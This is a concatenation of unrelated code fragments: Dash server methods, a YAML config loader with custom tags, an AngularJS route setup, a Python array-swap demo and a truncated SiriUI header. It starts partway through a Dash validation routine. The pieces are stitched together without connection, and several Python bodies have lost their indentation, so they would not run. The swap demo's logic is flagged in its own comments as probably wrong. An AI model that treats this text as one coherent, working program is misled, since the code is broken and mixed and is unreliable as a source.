                            path=p + "\n" + "[*] " + type(child).__name__,
                            index=index
                        )
            # Also check the child of val, as it will not be returned
            child = getattr(val, 'children', None)
            if not isinstance(child, (tuple, collections.MutableSequence)):
                if child and not _value_is_valid(child):
                    _raise_invalid(
                        bad_val=child,
                        outer_val=val,
                        path=type(child).__name__,
                        index=index
                    )
        # val is not a Component, but is at the top level of tree
        else:
            if not _value_is_valid(val):
                _raise_invalid(
                    bad_val=val,
                    outer_val=type(val).__name__,
                    path='',
                    index=index,
                    toplevel=True
                )
    # A list return (multi-output) is validated element by element.
    if isinstance(output_value, list):
        for i, val in enumerate(output_value):
            _validate_value(val, index=i)
    else:
        _validate_value(output_value)
# pylint: disable=dangerous-default-value
def clientside_callback(
        self, clientside_function, output, inputs=[], state=[]):
    """
    Create a callback that updates the output by calling a clientside
    (JavaScript) function instead of a Python function.

    Unlike `@app.callback`, `clientside_callback` is not a decorator:
    it takes a
    `dash.dependencies.ClientsideFunction(namespace, function_name)`
    argument that describes which JavaScript function to call
    (Dash will look for the JavaScript function at
    `window[namespace][function_name]`).

    For example:
    ```
    app.clientside_callback(
        ClientsideFunction('my_clientside_library', 'my_function'),
        Output('my-div', 'children'),
        [Input('my-input', 'value'),
         Input('another-input', 'value')]
    )
    ```

    With this signature, Dash's front-end will call
    `window.my_clientside_library.my_function` with the current
    values of the `value` properties of the components
    `my-input` and `another-input` whenever those values change.

    Include a JavaScript file by including it your `assets/` folder.
    The file can be named anything but you'll need to assign the
    function's namespace to the `window`. For example, this file might
    look like:
    ```
    window.my_clientside_library = {
        my_function: function(input_value_1, input_value_2) {
            return (
                parseFloat(input_value_1, 10) +
                parseFloat(input_value_2, 10)
            );
        }
    }
    ```
    """
    self._validate_callback(output, inputs, state)
    callback_id = _create_callback_id(output)
    # Clientside callbacks have no Python function; only the spec needed
    # by the front-end to locate window[namespace][function] is stored.
    self.callback_map[callback_id] = {
        'inputs': [
            {'id': c.component_id, 'property': c.component_property}
            for c in inputs
        ],
        'state': [
            {'id': c.component_id, 'property': c.component_property}
            for c in state
        ],
        'clientside_function': {
            'namespace': clientside_function.namespace,
            'function_name': clientside_function.function_name
        }
    }
# TODO - Update nomenclature.
# "Parents" and "Children" should refer to the DOM tree
# and not the dependency tree.
# The dependency tree should use the nomenclature
# "observer" and "controller".
# "observers" listen for changes from their "controllers". For example,
# if a graph depends on a dropdown, the graph is the "observer" and the
# dropdown is a "controller". In this case the graph's "dependency" is
# the dropdown.
# TODO - Check this map for recursive or other ill-defined non-tree
# relationships
# pylint: disable=dangerous-default-value
def callback(self, output, inputs=[], state=[]):
    """Register a server-side callback; returns a decorator.

    The decorated function is wrapped so that, when dispatched, its
    return value is validated, packaged into the JSON shape expected by
    dash-renderer, and serialized with the Plotly JSON encoder.

    :param output: Output or list/tuple of Outputs (multi-output).
    :param inputs: list/tuple of Input dependencies.
    :param state: list/tuple of State dependencies.
    """
    self._validate_callback(output, inputs, state)
    callback_id = _create_callback_id(output)
    multi = isinstance(output, (list, tuple))
    self.callback_map[callback_id] = {
        'inputs': [
            {'id': c.component_id, 'property': c.component_property}
            for c in inputs
        ],
        'state': [
            {'id': c.component_id, 'property': c.component_property}
            for c in state
        ],
    }
    def wrap_func(func):
        @wraps(func)
        def add_context(*args, **kwargs):
            # Run the user's callback, then build the JSON response.
            output_value = func(*args, **kwargs)
            if multi:
                if not isinstance(output_value, (list, tuple)):
                    raise exceptions.InvalidCallbackReturnValue(
                        'The callback {} is a multi-output.\n'
                        'Expected the output type to be a list'
                        ' or tuple but got {}.'.format(
                            callback_id, repr(output_value)
                        )
                    )
                if not len(output_value) == len(output):
                    raise exceptions.InvalidCallbackReturnValue(
                        'Invalid number of output values for {}.\n'
                        ' Expected {} got {}'.format(
                            callback_id,
                            len(output),
                            len(output_value)
                        )
                    )
                # Group returned values by component id -> {prop: value}.
                component_ids = collections.defaultdict(dict)
                has_update = False
                for i, o in enumerate(output):
                    val = output_value[i]
                    if val is not no_update:
                        has_update = True
                        o_id, o_prop = o.component_id, o.component_property
                        component_ids[o_id][o_prop] = val
                # If every output returned no_update, abort entirely.
                if not has_update:
                    raise exceptions.PreventUpdate
                response = {
                    'response': component_ids,
                    'multi': True
                }
            else:
                if output_value is no_update:
                    raise exceptions.PreventUpdate
                response = {
                    'response': {
                        'props': {
                            output.component_property: output_value
                        }
                    }
                }
            try:
                jsonResponse = json.dumps(
                    response,
                    cls=plotly.utils.PlotlyJSONEncoder
                )
            except TypeError:
                # Produce a precise diagnostic (raises with the offending
                # value's path) before falling back to a generic error.
                self._validate_callback_output(output_value, output)
                raise exceptions.InvalidCallbackReturnValue('''
The callback for property `{property:s}`
of component `{id:s}` returned a value
which is not JSON serializable.
In general, Dash properties can only be
dash components, strings, dictionaries, numbers, None,
or lists of those.
'''.format(
                    property=output.component_property,
                    id=output.component_id
                ).replace(' ', ''))
            return jsonResponse
        # Register the wrapper so dispatch() can find and invoke it.
        self.callback_map[callback_id]['callback'] = add_context
        return add_context
    return wrap_func
def dispatch(self):
    """Flask view: execute the callback targeted by the request body.

    Reads inputs/state/output from the POSTed JSON, exposes the values
    on ``flask.g`` (presumably consumed by the callback-context helpers
    — TODO confirm against the rest of the file), reorders the request
    values to match the registered callback signature, and returns the
    callback's JSON response.
    """
    body = flask.request.get_json()
    inputs = body.get('inputs', [])
    state = body.get('state', [])
    output = body['output']
    args = []
    flask.g.input_values = input_values = {
        '{}.{}'.format(x['id'], x['property']): x.get('value')
        for x in inputs
    }
    flask.g.state_values = {
        '{}.{}'.format(x['id'], x['property']): x.get('value')
        for x in state
    }
    changed_props = body.get('changedPropIds')
    flask.g.triggered_inputs = [
        {'prop_id': x, 'value': input_values[x]}
        for x in changed_props
    ] if changed_props else []
    response = flask.g.dash_response = flask.Response(
        mimetype='application/json')
    # Positional args must follow registration order: inputs first...
    for component_registration in self.callback_map[output]['inputs']:
        args.append([
            c.get('value', None) for c in inputs if
            c['property'] == component_registration['property'] and
            c['id'] == component_registration['id']
        ][0])
    # ...then state.
    for component_registration in self.callback_map[output]['state']:
        args.append([
            c.get('value', None) for c in state if
            c['property'] == component_registration['property'] and
            c['id'] == component_registration['id']
        ][0])
    response.set_data(self.callback_map[output]['callback'](*args))
    return response
def _validate_layout(self):
    """Ensure a layout has been assigned and component ids are unique."""
    if self.layout is None:
        raise exceptions.NoLayoutException(
            'The layout was `None` '
            'at the time that `run_server` was called. '
            'Make sure to set the `layout` attribute of your application '
            'before running the server.')
    to_validate = self._layout_value()
    layout_id = getattr(self.layout, 'id', None)
    # The root layout's own id (if any) also counts as taken.
    seen_ids = {layout_id} if layout_id else set()
    # pylint: disable=protected-access
    for component in to_validate._traverse():
        component_id = getattr(component, 'id', None)
        if component_id and component_id in seen_ids:
            raise exceptions.DuplicateIdError(
                'Duplicate component id found'
                ' in the initial layout: `{}`'.format(component_id))
        seen_ids.add(component_id)
def _setup_server(self):
    """One-time server preparation.

    Optionally collects user assets, validates the layout, and
    pre-generates the script/css HTML so that all resource collection
    and registration side effects happen up front.
    """
    if self.config.include_assets_files:
        self._walk_assets_directory()
    self._validate_layout()
    # Results are discarded; these calls are made for their side effects.
    self._generate_scripts_html()
    self._generate_css_dist_html()
def _add_assets_resource(self, url_path, file_path):
res = {'asset_path': url_path, 'filepath': file_path}
if self.config.assets_external_path:
res['external_url'] = '{}{}'.format(
self.config.assets_external_path, url_path)
self._assets_files.append(file_path)
return res
def _walk_assets_directory(self):
    """Walk the assets folder and register every js/css/favicon file.

    Files matching ``config.assets_ignore`` are skipped; within each
    directory files are added in sorted order so load order is
    deterministic.
    """
    walk_dir = self.config.assets_folder
    slash_splitter = re.compile(r'[\\/]+')
    ignore_str = self.config.assets_ignore
    ignore_filter = re.compile(ignore_str) if ignore_str else None
    for current, _, files in os.walk(walk_dir):
        if current == walk_dir:
            base = ''
        else:
            # Normalize the sub-path relative to the assets root to a
            # forward-slash URL fragment.
            s = current.replace(walk_dir, '').lstrip('\\').lstrip('/')
            splitted = slash_splitter.split(s)
            if len(splitted) > 1:
                base = '/'.join(slash_splitter.split(s))
            else:
                base = splitted[0]
        if ignore_filter:
            files_gen = (x for x in files if not ignore_filter.search(x))
        else:
            files_gen = files
        for f in sorted(files_gen):
            path = '/'.join([base, f]) if base else f
            full = os.path.join(current, f)
            if f.endswith('js'):
                self.scripts.append_script(
                    self._add_assets_resource(path, full))
            elif f.endswith('css'):
                self.css.append_css(self._add_assets_resource(path, full))
            elif f == 'favicon.ico':
                # NOTE(review): any favicon.ico found in the walk (not
                # just the root) is taken; the last one found wins.
                self._favicon = path
@staticmethod
def _invalid_resources_handler(err):
return err.args[0], 404
@staticmethod
def _serve_default_favicon():
    """Serve the favicon bundled with the dash package itself."""
    icon_bytes = pkgutil.get_data('dash', 'favicon.ico')
    return flask.Response(icon_bytes, content_type='image/x-icon')
def get_asset_url(self, path):
    """Return the full URL for an asset, honouring the pathname prefix."""
    return _get_asset_path(
        self.config.requests_pathname_prefix,
        path,
        self.config.assets_url_path.lstrip('/')
    )
def _setup_dev_tools(self, **kwargs):
    """Resolve dev-tools settings from kwargs, env vars and defaults."""
    debug = kwargs.get('debug', False)
    dev_tools = self._dev_tools = _AttributeDict()
    # Boolean toggles default to the debug flag itself.
    bool_attrs = (
        'ui',
        'props_check',
        'serve_dev_bundles',
        'hot_reload',
        'silence_routes_logging',
    )
    for attr in bool_attrs:
        dev_tools[attr] = get_combined_config(
            attr, kwargs.get(attr, None), default=debug
        )
    # Numeric settings carry their own defaults and are coerced to type.
    numeric_attrs = (
        ('hot_reload_interval', float, 3),
        ('hot_reload_watch_interval', float, 0.5),
        ('hot_reload_max_retry', int, 8),
    )
    for attr, coerce, default in numeric_attrs:
        raw = get_combined_config(attr, kwargs.get(attr, None),
                                  default=default)
        dev_tools[attr] = coerce(raw)
    return dev_tools
def enable_dev_tools(
        self,
        debug=None,
        dev_tools_ui=None,
        dev_tools_props_check=None,
        dev_tools_serve_dev_bundles=None,
        dev_tools_hot_reload=None,
        dev_tools_hot_reload_interval=None,
        dev_tools_hot_reload_watch_interval=None,
        dev_tools_hot_reload_max_retry=None,
        dev_tools_silence_routes_logging=None):
    """
    Activate the dev tools, called by `run_server`. If your application is
    served by wsgi and you want to activate the dev tools, you can call
    this method out of `__main__`.

    All parameters can be set by environment variables as listed.
    Values provided here take precedence over environment variables.

    Available dev_tools environment variables:
        - DASH_DEBUG
        - DASH_UI
        - DASH_PROPS_CHECK
        - DASH_SERVE_DEV_BUNDLES
        - DASH_HOT_RELOAD
        - DASH_HOT_RELOAD_INTERVAL
        - DASH_HOT_RELOAD_WATCH_INTERVAL
        - DASH_HOT_RELOAD_MAX_RETRY
        - DASH_SILENCE_ROUTES_LOGGING

    :param debug: Enable/disable all the dev tools unless overridden by the
        arguments or environment variables. Default is ``True`` when
        ``enable_dev_tools`` is called directly, and ``False`` when called
        via ``run_server``. env: ``DASH_DEBUG``
    :type debug: bool
    :param dev_tools_ui: Show the dev tools UI. env: ``DASH_UI``
    :type dev_tools_ui: bool
    :param dev_tools_props_check: Validate the types and values of Dash
        component props. env: ``DASH_PROPS_CHECK``
    :type dev_tools_props_check: bool
    :param dev_tools_serve_dev_bundles: Serve the dev bundles. Production
        bundles do not necessarily include all the dev tools code.
        env: ``DASH_SERVE_DEV_BUNDLES``
    :type dev_tools_serve_dev_bundles: bool
    :param dev_tools_hot_reload: Activate hot reloading when app, assets,
        and component files change. env: ``DASH_HOT_RELOAD``
    :type dev_tools_hot_reload: bool
    :param dev_tools_hot_reload_interval: Interval in seconds for the
        client to request the reload hash. Default 3.
        env: ``DASH_HOT_RELOAD_INTERVAL``
    :type dev_tools_hot_reload_interval: float
    :param dev_tools_hot_reload_watch_interval: Interval in seconds for the
        server to check asset and component folders for changes.
        Default 0.5. env: ``DASH_HOT_RELOAD_WATCH_INTERVAL``
    :type dev_tools_hot_reload_watch_interval: float
    :param dev_tools_hot_reload_max_retry: Maximum number of failed reload
        hash requests before failing and displaying a pop up. Default 8.
        env: ``DASH_HOT_RELOAD_MAX_RETRY``
    :type dev_tools_hot_reload_max_retry: int
    :param dev_tools_silence_routes_logging: Silence the `werkzeug` logger,
        will remove all routes logging. Enabled with debugging by default
        because hot reload hash checks generate a lot of requests.
        env: ``DASH_SILENCE_ROUTES_LOGGING``
    :type dev_tools_silence_routes_logging: bool
    :return: debug
    """
    # Called directly (not via run_server): default debug to True.
    if debug is None:
        debug = get_combined_config('debug', None, True)
    dev_tools = self._setup_dev_tools(
        debug=debug,
        ui=dev_tools_ui,
        props_check=dev_tools_props_check,
        serve_dev_bundles=dev_tools_serve_dev_bundles,
        hot_reload=dev_tools_hot_reload,
        hot_reload_interval=dev_tools_hot_reload_interval,
        hot_reload_watch_interval=dev_tools_hot_reload_watch_interval,
        hot_reload_max_retry=dev_tools_hot_reload_max_retry,
        silence_routes_logging=dev_tools_silence_routes_logging
    )
    if dev_tools.silence_routes_logging:
        logging.getLogger('werkzeug').setLevel(logging.ERROR)
        self.logger.setLevel(logging.INFO)
    if dev_tools.hot_reload:
        _reload = self._hot_reload
        _reload.hash = _generate_hash()
        # Watch the assets folder plus every registered component
        # package (and dash_renderer) for file changes.
        component_packages_dist = [
            os.path.dirname(package.path)
            if hasattr(package, 'path')
            else package.filename
            for package in (
                pkgutil.find_loader(x) for x in
                list(ComponentRegistry.registry) + ['dash_renderer']
            )
        ]
        _reload.watch_thread = threading.Thread(
            target=lambda: _watch.watch(
                [self.config.assets_folder] + component_packages_dist,
                self._on_assets_change,
                sleep_time=dev_tools.hot_reload_watch_interval)
        )
        # Daemonize so the watcher never blocks interpreter shutdown.
        _reload.watch_thread.daemon = True
        _reload.watch_thread.start()
    if (debug and dev_tools.serve_dev_bundles and
            not self.scripts.config.serve_locally):
        # Dev bundles only works locally.
        self.scripts.config.serve_locally = True
        print('WARNING: dev bundles requested with serve_locally=False.\n'
              'This is not supported, switching to serve_locally=True')
    return debug
# noinspection PyProtectedMember
def _on_assets_change(self, filename, modified, deleted):
    """Hot-reload watcher hook: react to a changed/deleted file.

    Marks the reload as "hard", refreshes the reload hash, and keeps the
    registered asset resources in sync with the file system (adding new
    js/css files, dropping deleted ones).

    :param filename: absolute path of the file that changed.
    :param modified: modification timestamp of the file.
    :param deleted: True when the file was removed.
    """
    _reload = self._hot_reload
    # All bookkeeping happens under the reload lock (shared with the
    # request handlers that read the hash/changed-assets list).
    with _reload.lock:
        _reload.hard = True
        _reload.hash = _generate_hash()
        if self.config.assets_folder in filename:
            asset_path = os.path.relpath(
                filename,
                os.path.commonprefix([self.config.assets_folder, filename])
            ).replace('\\', '/').lstrip('/')
            _reload.changed_assets.append({
                'url': self.get_asset_url(asset_path),
                'modified': int(modified),
                'is_css': filename.endswith('css')
            })
            # A brand-new file gets registered as a resource.
            if filename not in self._assets_files and not deleted:
                res = self._add_assets_resource(asset_path, filename)
                if filename.endswith('js'):
                    self.scripts.append_script(res)
                elif filename.endswith('css'):
                    self.css.append_css(res)
            if deleted:
                if filename in self._assets_files:
                    self._assets_files.remove(filename)

                def delete_resource(resources):
                    # Remove the first resource whose asset_path matches.
                    to_delete = None
                    for r in resources:
                        if r.get('asset_path') == asset_path:
                            to_delete = r
                            break
                    if to_delete:
                        resources.remove(to_delete)

                if filename.endswith('js'):
                    # pylint: disable=protected-access
                    delete_resource(self.scripts._resources._resources)
                elif filename.endswith('css'):
                    # pylint: disable=protected-access
                    delete_resource(self.css._resources._resources)
def run_server(
        self,
        port=8050,
        debug=False,
        dev_tools_ui=None,
        dev_tools_props_check=None,
        dev_tools_serve_dev_bundles=None,
        dev_tools_hot_reload=None,
        dev_tools_hot_reload_interval=None,
        dev_tools_hot_reload_watch_interval=None,
        dev_tools_hot_reload_max_retry=None,
        dev_tools_silence_routes_logging=None,
        **flask_run_options):
    """
    Start the flask server in local mode, you should not run this on a
    production server, use gunicorn/waitress instead.

    If a parameter can be set by an environment variable, that is listed
    too. Values provided here take precedence over environment variables.

    :param port: Port used to serve the application
    :type port: int
    :param debug: Set Flask debug mode and enable/disable all the dev
        tools unless overridden by the more specific arguments or
        environment variables. env: ``DASH_DEBUG``
    :type debug: bool
    :param dev_tools_ui: Show the dev tools UI. env: ``DASH_UI``
    :type dev_tools_ui: bool
    :param dev_tools_props_check: Validate the types and values of Dash
        component props. env: ``DASH_PROPS_CHECK``
    :type dev_tools_props_check: bool
    :param dev_tools_serve_dev_bundles: Serve the dev bundles. Production
        bundles do not necessarily include all the dev tools code.
        env: ``DASH_SERVE_DEV_BUNDLES``
    :type dev_tools_serve_dev_bundles: bool
    :param dev_tools_hot_reload: Activate hot reloading when app, assets,
        and component files change. env: ``DASH_HOT_RELOAD``
    :type dev_tools_hot_reload: bool
    :param dev_tools_hot_reload_interval: Interval in seconds for the
        client to request the reload hash. Default 3.
        env: ``DASH_HOT_RELOAD_INTERVAL``
    :type dev_tools_hot_reload_interval: float
    :param dev_tools_hot_reload_watch_interval: Interval in seconds for the
        server to check asset and component folders for changes.
        Default 0.5. env: ``DASH_HOT_RELOAD_WATCH_INTERVAL``
    :type dev_tools_hot_reload_watch_interval: float
    :param dev_tools_hot_reload_max_retry: Maximum number of failed reload
        hash requests before failing and displaying a pop up. Default 8.
        env: ``DASH_HOT_RELOAD_MAX_RETRY``
    :type dev_tools_hot_reload_max_retry: int
    :param dev_tools_silence_routes_logging: Silence the `werkzeug` logger,
        will remove all routes logging. Enabled with debugging by default
        because hot reload hash checks generate a lot of requests.
        env: ``DASH_SILENCE_ROUTES_LOGGING``
    :type dev_tools_silence_routes_logging: bool
    :param flask_run_options: Given to `Flask.run`
    :return:
    """
    debug = self.enable_dev_tools(
        debug,
        dev_tools_ui,
        dev_tools_props_check,
        dev_tools_serve_dev_bundles,
        dev_tools_hot_reload,
        dev_tools_hot_reload_interval,
        dev_tools_hot_reload_watch_interval,
        dev_tools_hot_reload_max_retry,
        dev_tools_silence_routes_logging,
    )
    if self._dev_tools.silence_routes_logging:
        # Since it's silenced, the address doesn't show anymore.
        host = flask_run_options.get('host', '127.0.0.1')
        ssl_context = flask_run_options.get('ssl_context')
        self.logger.info(
            'Running on %s://%s:%s%s',
            'https' if ssl_context else 'http',
            host, port, self.config.requests_pathname_prefix
        )
        # Generate a debugger pin and log it to the screen.
        debugger_pin = os.environ['WERKZEUG_DEBUG_PIN'] = '-'.join(
            itertools.chain(
                ''.join([str(random.randint(0, 9)) for _ in range(3)])
                for _ in range(3))
        )
        self.logger.info('Debugger PIN: %s', debugger_pin)
    self.server.run(port=port, debug=debug, **flask_run_options)
|
import yaml
from yaml.loader import Loader
import operator
from functools import reduce
from copy import deepcopy
from .py_utils import create_instance
try:
import torch
except ImportError:
torch = None
try:
import numpy as np
except ImportError:
np = None
def add(loader, node):
    """YAML ``!Add``: return the sum of the node's sequence items."""
    values = loader.construct_sequence(node)
    return sum(values)
def mul(loader, node):
    """YAML ``!Mul``: return the product of the node's sequence items."""
    values = loader.construct_sequence(node)
    return reduce(operator.mul, values)
def sub(loader, node):
    """YAML ``!Sub``: left-fold subtraction over the sequence items."""
    values = loader.construct_sequence(node)
    return reduce(operator.sub, values)
def div(loader, node):
    """YAML ``!Div``: left-fold true division over the sequence items."""
    values = loader.construct_sequence(node)
    return reduce(operator.truediv, values)
def numpy_array(loader, node):
    """YAML ``!NumpyArray``: build an ``np.ndarray`` from the sequence."""
    assert np is not None, "Numpy is not importable."
    values = loader.construct_sequence(node)
    return np.array(values)
def torch_tensor(loader, node):
    """YAML ``!TorchTensor``: build a ``torch.Tensor`` from the sequence."""
    assert torch is not None, "Torch is not importable."
    values = loader.construct_sequence(node)
    return torch.tensor(values)
def hyperopt(loader, node):
    """YAML ``!Hyperopt``: placeholder constructor — not implemented.

    The original body dropped into ``pdb.set_trace()``, a leftover
    debugging trap that would hang any non-interactive program loading a
    config containing ``!Hyperopt``. Fail loudly and clearly instead.
    """
    raise NotImplementedError(
        'The !Hyperopt YAML constructor is not implemented.')
# Register the arithmetic/array constructors under their YAML tags so
# configs can compute values inline, e.g. ``lr: !Div [1, 1000]``.
yaml.add_constructor('!Add', add)
yaml.add_constructor('!Mul', mul)
yaml.add_constructor('!Sub', sub)
yaml.add_constructor('!Div', div)
yaml.add_constructor('!NumpyArray', numpy_array)
yaml.add_constructor('!TorchTensor', torch_tensor)
yaml.add_constructor('!Hyperopt', hyperopt)
class OverrideDict(dict):
    """Marker dict: replaces (rather than merges into) the target dict
    during ``recursive_update``."""

    def after_override(self):
        """Return a plain ``dict`` copy, dropping the marker type."""
        return dict(self)
def override_constructor(loader, node):
    """YAML ``!Override``: wrap a mapping node in :class:`OverrideDict`."""
    if not isinstance(node, yaml.MappingNode):
        raise NotImplementedError('Node: ' + str(type(node)))
    return OverrideDict(loader.construct_mapping(node))


yaml.add_constructor('!Override', override_constructor)
class KeyDeleter:
    """Marker: requests deletion of a dictionary key in recursive_update."""
def key_delete_constructor(loader, node):
    """YAML ``!Del``: build a KeyDeleter marker (scalar must be empty)."""
    value = node.value
    assert value == '', f'{value}'
    return KeyDeleter()


yaml.add_constructor('!Del', key_delete_constructor)
# NOTE(review): this definition is byte-for-byte identical to the
# `override_constructor` defined above (and already registered for
# '!Override'); it harmlessly rebinds the same name and looks like a
# copy/paste leftover — candidate for removal.
def override_constructor(loader, node):
    # Only mapping nodes may be wrapped as whole-dict overrides.
    if isinstance(node, yaml.MappingNode):
        return OverrideDict(loader.construct_mapping(node))
    else:
        raise NotImplementedError('Node: ' + str(type(node)))
def _recursive_update_inplace(d1, d2):
    """Merge ``d2`` into ``d1`` in place and return the merged dict.

    Special markers in ``d2`` control the merge:
    - an ``OverrideDict`` replaces the corresponding ``d1`` value wholesale;
    - a ``KeyDeleter`` instance (or the literal string "KeyDeleter")
      deletes the key from ``d1``.
    Nested plain dicts are merged recursively; any other value overwrites.
    """
    if isinstance(d2, OverrideDict):
        # if requested, just override the whole dict d1
        return d2.after_override()
    for key, value in d2.items():
        if isinstance(value, KeyDeleter) or value == "KeyDeleter":
            # delete the key in d1 if requested
            if key in d1:
                del d1[key]
        elif key in d1 and isinstance(d1[key], dict) and isinstance(value, dict):
            # if the key is present in both dicts, and both values are dicts, update recursively
            d1[key] = _recursive_update_inplace(d1[key], value)
        else:
            # otherwise, just assign the value
            d1[key] = value
    return d1
def recursive_update(d1, d2):
    """Recursively merge ``d2`` into ``d1`` and return the result.

    Neither input is modified: both are deep-copied before the in-place
    merge. ``OverrideDict`` values replace whole sub-dicts and
    ``KeyDeleter`` values remove keys.

    :param d1: dict
    :param d2: dict
    :return: dict
    """
    # make sure there are no side effects
    return _recursive_update_inplace(deepcopy(d1), deepcopy(d2))
class TempArgObj:
    """Scalar placeholder for a ``!Obj:<tag>`` node, re-dumpable as-is."""

    def __init__(self, value, tag, style):
        self.value = value
        self.tag = tag        # class path to construct later
        self.style = style    # original scalar style, preserved on dump

    @staticmethod
    def to_yaml(dumper, data):
        """Represent the placeholder back as ``!Obj:<tag> value``."""
        return dumper.represent_scalar(
            f'!Obj:{data.tag}', data.value, style=data.style)
class TempArgsObj(list):
    """Sequence placeholder for a ``!Obj:<tag>`` node (positional args)."""

    def __init__(self, value, tag, flow_style):
        super(TempArgsObj, self).__init__(value)
        self.tag = tag                  # class path to construct later
        self.flow_style = flow_style    # original flow style, kept on dump

    @staticmethod
    def to_yaml(dumper, data):
        """Represent the placeholder back as a ``!Obj:<tag>`` sequence."""
        return dumper.represent_sequence(
            f'!Obj:{data.tag}', data, flow_style=data.flow_style)
class TempKwargsObj(dict):
    """Mapping placeholder for a ``!Obj:<tag>`` node (keyword args)."""

    def __init__(self, mapping, tag, flow_style):
        super(TempKwargsObj, self).__init__(mapping)
        # save tag (which is the class to be constructed) in the dict to
        # allow updating via recursive_update
        self['__tag__'] = tag
        self.flow_style = flow_style

    @staticmethod
    def to_yaml(dumper, data):
        """Dump back as ``!Obj:<tag>``; pops '__tag__' (mutates data)."""
        tag = data.pop('__tag__')
        return dumper.represent_mapping(
            f'!Obj:{tag}', data, flow_style=data.flow_style)
def temp_obj_constructor(loader, tag_suffix, node):
    """Multi-constructor for ``!Obj:<tag_suffix>`` nodes.

    Builds the matching placeholder (scalar -> TempArgObj, sequence ->
    TempArgsObj, mapping -> TempKwargsObj) instead of instantiating the
    target class, preserving the node's original YAML style.
    """
    if isinstance(node, yaml.ScalarNode):
        return TempArgObj(loader.construct_scalar(node), tag_suffix, style=node.style)
    if isinstance(node, yaml.SequenceNode):
        return TempArgsObj(loader.construct_sequence(node), tag_suffix, flow_style=node.flow_style)
    if isinstance(node, yaml.MappingNode):
        return TempKwargsObj(loader.construct_mapping(node), tag_suffix, flow_style=node.flow_style)
    raise NotImplementedError('Node: ' + str(type(node)))
# Register the '!Obj:' placeholder constructor and the matching representers
# so configs can be loaded, updated, and dumped again without instantiating
# the target classes.
yaml.add_multi_constructor('!Obj:', temp_obj_constructor)
yaml.add_representer(TempArgObj, TempArgObj.to_yaml)
yaml.add_representer(TempArgsObj, TempArgsObj.to_yaml)
yaml.add_representer(TempKwargsObj, TempKwargsObj.to_yaml)
class TempKwargsOverrideObj(TempKwargsObj, OverrideDict):
    """An ``!OverrideObj:`` mapping placeholder: during recursive config
    updates it replaces the corresponding mapping instead of merging into it
    (OverrideDict semantics)."""

    def after_override(self):
        # Once the override has been applied, drop the override semantics:
        # return a plain TempKwargsObj carrying the same tag and contents.
        tag = self.pop('__tag__')
        return TempKwargsObj(mapping=dict(self), tag=tag, flow_style=self.flow_style)
def temp_override_obj_constructor(loader, tag_suffix, node):
    """Multi-constructor for ``!OverrideObj:<tag_suffix>`` nodes.

    Identical to ``temp_obj_constructor`` except that mapping nodes produce
    ``TempKwargsOverrideObj`` (replace-on-merge semantics) instead of
    ``TempKwargsObj``.
    """
    if isinstance(node, yaml.ScalarNode):
        return TempArgObj(loader.construct_scalar(node), tag_suffix, style=node.style)
    if isinstance(node, yaml.SequenceNode):
        return TempArgsObj(loader.construct_sequence(node), tag_suffix, flow_style=node.flow_style)
    if isinstance(node, yaml.MappingNode):
        return TempKwargsOverrideObj(loader.construct_mapping(node), tag_suffix, flow_style=node.flow_style)
    raise NotImplementedError('Node: ' + str(type(node)))


yaml.add_multi_constructor('!OverrideObj:', temp_override_obj_constructor)
class ObjectLoader(Loader):
    """
    Loader for python object construction

    Examples:
        A node tagged ``!Obj:<dotted.path>`` is turned into a live instance
        via ``create_instance({'<dotted.path>': <constructor arguments>})``.
    """

    def construct_instance(self, suffix, node):
        # Normalize the node into the argument dict understood by
        # create_instance().
        if isinstance(node, yaml.MappingNode):  # keyword arguments specified
            class_dict = self.construct_mapping(node, deep=True)
        elif isinstance(node, yaml.SequenceNode):  # positional arguments specified
            class_dict = dict(args=self.construct_sequence(node, deep=True))
        elif isinstance(node, yaml.ScalarNode):  # only one argument specified as scalar
            class_dict = dict(args=[self.construct_scalar(node)])
        else:
            raise NotImplementedError
        return create_instance({suffix: class_dict})


# add the python object constructor to the loader
ObjectLoader.add_multi_constructor('!Obj:', ObjectLoader.construct_instance)
|
// Root module of the login SPA; depends on ngRoute for client-side routing
// and angularfire's "firebase" module.
var myApp = angular.module("loginApp", ["ngRoute", "firebase"]);

// Route table: login/register share one controller; unknown paths fall back
// to /login.  NOTE(review): $locationProvider is injected but never used --
// presumably HTML5 mode was planned; confirm before removing.
myApp.config(["$routeProvider", "$locationProvider", function ($routeProvider, $locationProvider) {
  $routeProvider
    .when("/login", {
      templateUrl: "/views/login.html",
      controller: "registerCtr"
    })
    .when("/register", {
      templateUrl: "/views/register.html",
      controller: "registerCtr"
    })
    .when("/success", {
      templateUrl: "/views/success.html",
      controller: "successCtr"
    })
    .when("/home", {
      templateUrl: "/views/home.html"
    })
    .otherwise({
      redirectTo: "/login"
    });
}]);
def swap(arr):
    """Swap every adjacent pair of ``arr`` in place, printing each index pair.

    A trailing element (odd length) is left untouched.
    """
    for left in range(0, len(arr) - 1, 2):
        print(left, end=" ")  # current
        print(left + 1)  # next
        # Pythonic tuple swap instead of a temp variable.
        arr[left], arr[left + 1] = arr[left + 1], arr[left]
def swapAlternative(arr, n):
    # NOTE(review): each iteration calls swap(arr), which swaps EVERY adjacent
    # pair of the whole array and prints the index pairs, so this performs
    # n-1 full passes.  Two consecutive passes cancel out, making the net
    # effect depend on the parity of n-1; for the call below (n=6, 5 passes)
    # the result happens to equal a single swap(arr) pass.  Presumably a
    # single call was intended -- confirm before relying on this for odd n.
    for i in range(n):
        if (i+1 < n):
            swap(arr)
def printArray(arr, n):
    """Print the first ``n`` elements of ``arr``, one per line.

    Raises IndexError when ``n`` exceeds ``len(arr)`` (same as the original
    index-based loop).
    """
    idx = 0
    while idx < n:
        print(arr[idx])
        idx += 1
# Demo: swap adjacent pairs of a 6-element array and print the result.
arr = [1,3,5,4,6,7]
# brr = [4,5,7,8,5]
swapAlternative(arr, 6)  # see NOTE in swapAlternative about repeated passes
# reverse(arr, 5)
printArray(arr, 6)
/*
* This header is generated by classdump-dyld 1.5
* on Wednesday, April 14, 2021 at 2:29:02 PM Mountain Standard Time
* Operating System: Version 14.4 (Build 18K802)
* Image Source: /System/Library/PrivateFrameworks/SiriUI.framework/SiriUI
* classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos. Updated by Kevin Bradley.
*/
@class AceObject;

// Protocol adopted by Siri UI view controllers (generated header -- see the
// classdump banner above; method semantics are inferred from names only).
@protocol SiriUIViewController <NSObject>

@property (nonatomic,retain) AceObject * aceObject;
@property (assign,getter=isUtteranceUserInteractionEnabled,nonatomic) BOOL utteranceUserInteractionEnabled;

@optional
// Layout hooks -- sizing and padding queries made by the Siri container.
-(double)baselineOffsetFromBottom;
